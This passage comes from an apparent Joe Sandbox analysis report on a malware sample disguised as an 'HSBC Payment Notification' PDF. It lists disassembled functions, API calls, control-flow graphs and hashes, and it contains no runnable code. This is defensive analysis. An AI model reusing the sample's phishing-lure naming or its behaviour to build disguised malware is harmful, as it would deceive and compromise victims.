                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 48322524-0
                                                                                                                                                    • Opcode ID: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                                                                                                                                    • Instruction ID: 0270b6235cd3a211ff5fd07bbdee7491b27fcb3ec88e67c823a813e2b68c3cf0
                                                                                                                                                    • Opcode Fuzzy Hash: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                                                                                                                                    • Instruction Fuzzy Hash: 54E0D8328105006B4610AB78EC0E4EE775C9E85335F100B6AFC35C11D0FB789904969F
                                                                                                                                                    Function 02F1A350 Relevance: 2.4, APIs: 1, Instructions: 915COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 539238920071fc7feb624a13e9099a447b1940ce16274b7e8ac76d2e455ff04f
                                                                                                                                                    • Instruction ID: a14d1cbe81012149e7e026eda6496b5b7b2a927923320eddc6de07e02a980f82
                                                                                                                                                    • Opcode Fuzzy Hash: 539238920071fc7feb624a13e9099a447b1940ce16274b7e8ac76d2e455ff04f
                                                                                                                                                    • Instruction Fuzzy Hash: AD62F921D0D3C09EF73686288A297367FE15F522E8FCC458DD7C68B6E2D3A59408C792
                                                                                                                                                    Function 004109D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410A5B
                                                                                                                                                    • timeGetTime.WINMM ref: 00410D16
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410E53
                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00410E61
                                                                                                                                                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00410EFA
                                                                                                                                                    • DestroyWindow.USER32 ref: 00410F06
                                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00410F20
                                                                                                                                                    • Sleep.KERNEL32(0000000A,?,?), ref: 00444E83
                                                                                                                                                    • TranslateMessage.USER32(?), ref: 00445C60
                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 00445C6E
                                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00445C82
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                                                                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbL$pbL$pbL$pbL
                                                                                                                                                    • API String ID: 4212290369-1082885916
                                                                                                                                                    • Opcode ID: 3e6f58085f7c525aff4491d5e4cd6851c14437d0b3d5175f03e5eaf6e645ab9d
                                                                                                                                                    • Instruction ID: d38973a2ad724f636fdb88fa2895c4b9f48f3c0ad1428ec49bcc8c13362f202a
                                                                                                                                                    • Opcode Fuzzy Hash: 3e6f58085f7c525aff4491d5e4cd6851c14437d0b3d5175f03e5eaf6e645ab9d
                                                                                                                                                    • Instruction Fuzzy Hash: BBB29470608741DFEB24DF24C445BABB7E4BF84304F14492FE54997292D779E885CB8A
                                                                                                                                                    Function 02F1597D Relevance: 25.8, APIs: 13, Strings: 1, Instructions: 1348threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RtlExitUserThread.NTDLL(00000000), ref: 02F158C7
                                                                                                                                                    • CreateThread.KERNEL32(00000000), ref: 02F15915
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Thread$CreateExitUser
                                                                                                                                                    • String ID: gfff
                                                                                                                                                    • API String ID: 4108186749-1553575800
                                                                                                                                                    • Opcode ID: db963b221cb009b413e12e8263ed2a5da47d99541579b1b50224c4f3ab60a1da
                                                                                                                                                    • Instruction ID: 4dc8b8afe9f44691593c007964536f28f288b5431aaa9afb723bc4eb17a9533e
                                                                                                                                                    • Opcode Fuzzy Hash: db963b221cb009b413e12e8263ed2a5da47d99541579b1b50224c4f3ab60a1da
                                                                                                                                                    • Instruction Fuzzy Hash: 33A2FA21D0D3C0DEFB36872889687367FA15B926ECFCC458AD7964B1E2D3A59408C753
                                                                                                                                                    Function 00469155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2829 469155-469205 call 431940 call 420db6 call 40522e call 468f5f call 404ee5 call 42354c 2842 46920b-469212 call 469734 2829->2842 2843 4692b8-4692bf call 469734 2829->2843 2848 4692c1-4692c3 2842->2848 2849 469218-4692b6 call 4240fb call 422dbc call 422d8d call 4240fb call 422d8d * 2 2842->2849 2843->2848 2850 4692c8 2843->2850 2851 46952a-46952b 2848->2851 2853 4692cb-469387 call 404f0b * 8 call 4698e3 call 42525b 2849->2853 2850->2853 2854 469548-469558 call 405211 2851->2854 2888 469390-4693ab call 468fa5 2853->2888 2889 469389-46938b 2853->2889 2892 4693b1-4693b9 2888->2892 2893 46943d-469449 call 4253a6 2888->2893 2889->2851 2894 4693c1 2892->2894 2895 4693bb-4693bf 2892->2895 2900 46945f-469463 2893->2900 2901 46944b-46945a DeleteFileW 2893->2901 2897 4693c6-4693e4 call 404f0b 2894->2897 2895->2897 2907 4693e6-4693eb 2897->2907 2908 46940e-469424 call 468953 call 424863 2897->2908 2903 469505-469519 CopyFileW 2900->2903 2904 469469-4694f2 call 4240bb call 4699ea call 468b06 2900->2904 2901->2851 2905 46952d-469543 DeleteFileW call 4698a2 2903->2905 2906 46951b-469528 DeleteFileW 2903->2906 2904->2905 2925 4694f4-469503 DeleteFileW 2904->2925 2905->2854 2906->2851 2912 4693ee-469401 call 4690dd 2907->2912 2921 469429-469434 2908->2921 2922 469403-46940c 2912->2922 2921->2892 2924 46943a 2921->2924 2922->2908 2924->2893 2925->2851
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00468F5F: __time64.LIBCMT ref: 00468F69
                                                                                                                                                      • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                                                                                                                                                    • __wsplitpath.LIBCMT ref: 00469234
                                                                                                                                                      • Part of subcall function 004240FB: __wsplitpath_helper.LIBCMT ref: 0042413B
                                                                                                                                                    • _wcscpy.LIBCMT ref: 00469247
                                                                                                                                                    • _wcscat.LIBCMT ref: 0046925A
                                                                                                                                                    • __wsplitpath.LIBCMT ref: 0046927F
                                                                                                                                                    • _wcscat.LIBCMT ref: 00469295
                                                                                                                                                    • _wcscat.LIBCMT ref: 004692A8
                                                                                                                                                      • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FDE
                                                                                                                                                      • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FED
                                                                                                                                                    • _wcscmp.LIBCMT ref: 004691EF
                                                                                                                                                      • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                                                                                                                                                      • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00469452
                                                                                                                                                    • _wcsncpy.LIBCMT ref: 004694C5
                                                                                                                                                    • DeleteFileW.KERNEL32(?,?), ref: 004694FB
                                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00469511
                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469522
                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469534
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1500180987-0
                                                                                                                                                    • Opcode ID: 72f74135f6da1f003ebd9f44f595e8cd29ac2ed1f7a032e3997be759fd394df1
                                                                                                                                                    • Instruction ID: 02a21988af13e7247216c1d96107bbd8e14577c6ac0cce12fd44c5267f831f24
                                                                                                                                                    • Opcode Fuzzy Hash: 72f74135f6da1f003ebd9f44f595e8cd29ac2ed1f7a032e3997be759fd394df1
                                                                                                                                                    • Instruction Fuzzy Hash: 22C13DB1900129AADF11DF95CC81ADEB7BCEF85314F0040ABF609E6251EB749E858F69
                                                                                                                                                    Function 00403015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 0040309E
                                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                                                                                                                    • LoadIconW.USER32(000000A9), ref: 004030F2
                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                                                                    • Opcode ID: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                                                                                                                                                    • Instruction ID: 4440f0663549e4d62e3da2fdffcae7bb40582d53fb7b12173dce245a48cd956c
                                                                                                                                                    • Opcode Fuzzy Hash: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                                                                                                                                                    • Instruction Fuzzy Hash: 5F317A71801348AFDB50DFA4DC84A9DBFF0FB09310F24456EE480E62A0D7B91599CF69
                                                                                                                                                    Function 00403041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 0040309E
                                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                                                                                                                    • LoadIconW.USER32(000000A9), ref: 004030F2
                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                                                                    • Opcode ID: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                                                                                                                                                    • Instruction ID: 5f72cbcfe52bedf9aac6cae92f5874e6cc1455117f94183018d2e1bba946cea4
                                                                                                                                                    • Opcode Fuzzy Hash: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                                                                                                                                                    • Instruction Fuzzy Hash: DD21F9B1911208AFEB40EF94EC48B9DBBF4FB08700F10453AF511A62A0D7B555948FA9
                                                                                                                                                    Function 0040708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2995 40708b-4071b0 call 431940 call 407667 call 404706 call 42050b call 407cab call 403f74 call 407667 call 407d8c RegOpenKeyExW 3012 43e8b1-43e8cc RegQueryValueExW 2995->3012 3013 4071b6-4071d3 call 405904 * 2 2995->3013 3015 43e943-43e94f RegCloseKey 3012->3015 3016 43e8ce-43e90d call 420db6 call 40522e RegQueryValueExW 3012->3016 3015->3013 3018 43e955-43e959 3015->3018 3028 43e92b-43e931 3016->3028 3029 43e90f-43e929 call 407bcc 3016->3029 3021 43e95e-43e984 call 4079f2 * 2 3018->3021 3035 43e986-43e994 call 4079f2 3021->3035 3036 43e9a9-43e9b6 call 422bfc 3021->3036 3033 43e933-43e940 call 420e2c * 2 3028->3033 3034 43e941 3028->3034 3029->3028 3033->3034 3034->3015 3035->3036 3045 43e996-43e9a7 call 422d8d 3035->3045 3047 43e9b8-43e9c9 call 422bfc 3036->3047 3048 43e9dc-43ea16 call 407de1 call 403f74 call 405904 call 4079f2 3036->3048 3056 43ea1c-43ea1d 3045->3056 3047->3048 3057 43e9cb-43e9db call 422d8d 3047->3057 3048->3013 3048->3056 3056->3021 3057->3048
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00404706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C52F8,?,004037AE,?), ref: 00404724
                                                                                                                                                      • Part of subcall function 0042050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00407165), ref: 0042052D
                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004071A8
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0043E8C8
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0043E909
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0043E947
                                                                                                                                                    • _wcscat.LIBCMT ref: 0043E9A0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                    • API String ID: 2673923337-2727554177
                                                                                                                                                    • Opcode ID: 83c5073b2668065703488d5483890a7ef0431309ae9678d49bae78ff1a523707
                                                                                                                                                    • Instruction ID: d25a402f486e77f999364444344266e14871576642d40cf04fb282302ec68e46
                                                                                                                                                    • Opcode Fuzzy Hash: 83c5073b2668065703488d5483890a7ef0431309ae9678d49bae78ff1a523707
                                                                                                                                                    • Instruction Fuzzy Hash: E9718E71509301AEC340EF26E841D5BBBE8FF88314F51893FF445972A1DB79A948CB5A
                                                                                                                                                    Function 00403633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 3065 403633-403681 3067 4036e1-4036e3 3065->3067 3068 403683-403686 3065->3068 3067->3068 3069 4036e5 3067->3069 3070 4036e7 3068->3070 3071 403688-40368f 3068->3071 3072 4036ca-4036d2 DefWindowProcW 3069->3072 3073 4036ed-4036f0 3070->3073 3074 43d0cc-43d0fa call 411070 call 411093 3070->3074 3075 403695-40369a 3071->3075 3076 40374b-403753 PostQuitMessage 3071->3076 3078 4036d8-4036de 3072->3078 3079 4036f2-4036f3 3073->3079 3080 403715-40373c SetTimer RegisterWindowMessageW 3073->3080 3108 43d0ff-43d106 3074->3108 3082 4036a0-4036a2 3075->3082 3083 43d154-43d168 call 462527 3075->3083 3077 403711-403713 3076->3077 3077->3078 3088 4036f9-40370c KillTimer call 40443a call 403114 3079->3088 3089 43d06f-43d072 3079->3089 3080->3077 3084 40373e-403749 CreatePopupMenu 3080->3084 3085 403755-403764 call 4044a0 3082->3085 3086 4036a8-4036ad 3082->3086 3083->3077 3102 43d16e 3083->3102 3084->3077 3085->3077 3092 4036b3-4036b8 3086->3092 3093 43d139-43d140 3086->3093 3088->3077 3096 43d074-43d076 3089->3096 3097 43d0a8-43d0c7 MoveWindow 3089->3097 3100 43d124-43d134 call 462d36 3092->3100 3101 4036be-4036c4 3092->3101 3093->3072 3107 43d146-43d14f call 457c36 3093->3107 3104 43d097-43d0a3 SetFocus 3096->3104 3105 43d078-43d07b 3096->3105 3097->3077 3100->3077 3101->3072 3101->3108 3102->3072 3104->3077 3105->3101 3109 43d081-43d092 call 411070 3105->3109 3107->3072 3108->3072 3113 43d10c-43d11f call 40443a call 40434a 3108->3113 3109->3077 3113->3072
                                                                                                                                                    APIs
                                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 004036D2
                                                                                                                                                    • KillTimer.USER32(?,00000001), ref: 004036FC
                                                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0040371F
                                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040372A
                                                                                                                                                    • CreatePopupMenu.USER32 ref: 0040373E
                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 0040374D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                    • String ID: TaskbarCreated$%I
                                                                                                                                                    • API String ID: 129472671-1195164674
                                                                                                                                                    • Opcode ID: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
                                                                                                                                                    • Instruction ID: dec945db719cbeb7d7ffc5e313a4f07f26295059660cff28048481092df75402
                                                                                                                                                    • Opcode Fuzzy Hash: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
                                                                                                                                                    • Instruction Fuzzy Hash: F34127B1110505ABDB246F68EC09F7E3E98EB44302F50453BF602A63E1C67EAD95972E
                                                                                                                                                    Function 00403A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00403A50
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                                                                                                                                                    • LoadIconW.USER32(00000063), ref: 00403A76
                                                                                                                                                    • LoadIconW.USER32(000000A4), ref: 00403A88
                                                                                                                                                    • LoadIconW.USER32(000000A2), ref: 00403A9A
                                                                                                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                                                                                                                                                    • RegisterClassExW.USER32(?), ref: 00403B16
                                                                                                                                                      • Part of subcall function 00403041: GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                                                                                                                      • Part of subcall function 00403041: RegisterClassExW.USER32(00000030), ref: 0040309E
                                                                                                                                                      • Part of subcall function 00403041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                                                                                                                      • Part of subcall function 00403041: InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                                                                                                                      • Part of subcall function 00403041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                                                                                                                      • Part of subcall function 00403041: LoadIconW.USER32(000000A9), ref: 004030F2
                                                                                                                                                      • Part of subcall function 00403041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
